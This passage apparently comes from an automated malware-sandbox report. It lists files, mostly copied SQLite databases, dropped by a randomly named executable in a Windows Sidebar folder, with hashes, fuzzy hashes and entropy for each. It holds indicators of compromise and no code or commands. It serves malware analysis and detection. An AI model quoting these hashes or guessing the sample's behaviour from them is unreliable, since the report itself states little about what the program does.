                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):25
                                                                                                                                                                  Entropy (8bit):4.5638561897747225
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:9QreHSwbRYSkmX:NJYSvX
                                                                                                                                                                  MD5:C16C1E4ACE90A14EBBF27681ED84B808
                                                                                                                                                                  SHA1:33E4730B5BAA28ABB6F5718A3DD0329267D2EE03
                                                                                                                                                                  SHA-256:B21E61E8A39857C0E50321D1A239D268FF5BEB036B10BC8EF326CC9478FAFF36
                                                                                                                                                                  SHA-512:49173A8D6116AAF6E73BFFF86422AB2DDE85BC92D56E4E7F3B54B4DA2E7A5DC23D22CE57E24D576B4A0DE26AE44B250763CCE4C0BF0EE6191C1E995670C2FDB3
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:F871BuNg8aKwU9O4WnVi2GbCr
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                  Entropy (8bit):0.47147045728725767
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                  Entropy (8bit):0.7873599747470391
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                  Entropy (8bit):2.5793180405395284
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5712781801655107
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                  Entropy (8bit):2.5793180405395284
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
